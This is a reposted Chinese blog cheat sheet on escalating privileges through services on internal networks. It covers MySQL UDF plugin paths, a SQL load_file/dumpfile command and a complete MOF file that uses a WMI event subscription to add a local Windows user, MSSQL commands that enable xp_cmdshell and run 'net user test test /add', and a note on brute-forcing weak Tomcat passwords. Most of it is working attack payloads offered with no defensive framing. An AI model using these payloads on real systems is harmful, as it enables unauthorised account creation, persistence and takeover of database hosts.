首页 > 其他 > 详细

内网提权-服务篇

时间:2020-03-02 10:24:22      阅读:91      评论:0      收藏:0      [点我收藏+]

服务提权
     UDF提权
         windows
             UDF
                 mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/
                 mysql版本>5.1 ,UDF导出到安静路径MYSQL/Lib/Plugin/
         linux
             /usr/lib/mysql/plugin/
         要求有些权限,单引号未被过滤
     MOF提权
         windows专属
             流程:  1、 首先找个可写的目录,将我们的MOF文件上传上去。
2、 执行以下sql语句,mof文件内的命令便会执行。
select load_file(‘C:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’
             mofcomp.exe xxxxx.mof 执行mof文件
             调用imofompiler接口的$complieFile方法
             #pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
     mssql
         xp_cmdshell
             开启:EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;
             exec xp_cmdshell ‘net user test test /add’
         xp_regwrite
         xp_regrea
     tomcat
         弱口令爆破

内网提权-服务篇

原文:https://www.cnblogs.com/simon7s/p/12393391.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!